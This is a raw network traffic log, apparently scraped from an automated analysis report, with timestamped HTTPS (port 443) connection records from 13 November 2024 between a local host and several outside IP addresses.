                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735064983 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735090017 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735099077 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735110044 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735115051 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735147953 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735419035 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.735474110 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736422062 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736453056 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736509085 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736525059 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736541986 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736543894 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736565113 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736567974 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736589909 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736601114 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736644983 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736705065 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.736759901 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.745311975 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.745378971 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.745481968 CET49917443192.168.2.17192.28.147.68
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.745495081 CET44349917192.28.147.68192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776036978 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776297092 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776304960 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776746035 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776793003 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776823044 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776830912 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.776850939 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777411938 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777498007 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777681112 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777739048 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777740002 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.777904034 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.778048992 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.778095961 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.778332949 CET49921443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.778340101 CET443499213.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.779040098 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.779062986 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.779126883 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.779328108 CET49943443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.779337883 CET443499433.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.784828901 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.784888029 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.784894943 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.784913063 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.784972906 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785001040 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785018921 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785031080 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785070896 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785115004 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785115957 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785121918 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785147905 CET44349920157.240.0.6192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.785193920 CET49920443192.168.2.17157.240.0.6
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.788450003 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.788459063 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.788523912 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.788856983 CET49944443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.788866043 CET44349944157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793024063 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793045998 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793113947 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793281078 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793313980 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793365002 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793459892 CET49945443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793472052 CET44349945157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793601990 CET49946443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.793615103 CET44349946157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806477070 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806525946 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806581974 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806581974 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806600094 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.806638956 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.807406902 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.807444096 CET44349926157.240.253.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.807504892 CET49926443192.168.2.17157.240.253.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.809556961 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.809566975 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.809627056 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.809799910 CET49947443192.168.2.17157.240.0.35
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.809809923 CET44349947157.240.0.35192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820203066 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820230007 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820241928 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820265055 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820275068 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820285082 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820291996 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820300102 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820311069 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820327044 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820362091 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.820365906 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.823139906 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.823159933 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.823200941 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.823206902 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.823226929 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.837594986 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.837785959 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.837985992 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.838001013 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.839482069 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.839540958 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840218067 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840281010 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840325117 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840332985 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840347052 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840382099 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840385914 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840399027 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840437889 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840548992 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840631008 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.840993881 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.841001034 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.841505051 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.841593027 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.841645002 CET44349928142.250.186.98192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.841695070 CET49928443192.168.2.17142.250.186.98
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850682020 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850716114 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850758076 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850775957 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850780964 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850812912 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850836039 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.850955963 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.851006031 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.851015091 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.869519949 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875062943 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875224113 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875267029 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875297070 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875303984 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875307083 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875329018 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875360966 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.875386953 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.876303911 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.876374006 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.877259970 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.877315998 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.877418041 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.880559921 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.880630016 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.884516954 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.891107082 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.891182899 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.891637087 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.891724110 CET44349919157.240.253.1192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.891786098 CET49919443192.168.2.17157.240.253.1
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.916526079 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.916547060 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.964555979 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996126890 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996144056 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996164083 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996216059 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996225119 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996248960 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.996265888 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.001709938 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.001771927 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016853094 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016901016 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016931057 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016938925 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016961098 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.016982079 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.021702051 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.021758080 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.030810118 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.030837059 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.030904055 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031138897 CET49948443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031150103 CET4434994854.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031481028 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031537056 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031548023 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031554937 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.031599998 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.046200037 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.046219110 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.046281099 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.046300888 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.046314001 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091409922 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091492891 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091550112 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091552973 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091626883 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091687918 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091690063 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091723919 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091783047 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.091783047 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092076063 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092118025 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092133045 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092144966 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092190981 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092200041 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092242956 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092308044 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.092371941 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.093170881 CET49927443192.168.2.1754.75.69.192
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.093183994 CET4434992754.75.69.192192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.093976021 CET49923443192.168.2.1718.244.18.112
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.093991995 CET4434992318.244.18.112192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.094938993 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.095073938 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.095127106 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.095441103 CET49930443192.168.2.1791.228.74.200
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.095454931 CET4434993091.228.74.200192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.101303101 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.101330042 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.101401091 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.101634979 CET49949443192.168.2.173.248.162.96
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.101645947 CET443499493.248.162.96192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.137053013 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.137141943 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.137217045 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.137516975 CET49932443192.168.2.1746.137.111.148
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.137535095 CET4434993246.137.111.148192.168.2.17
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.156872988 CET49952443192.168.2.1791.228.74.200
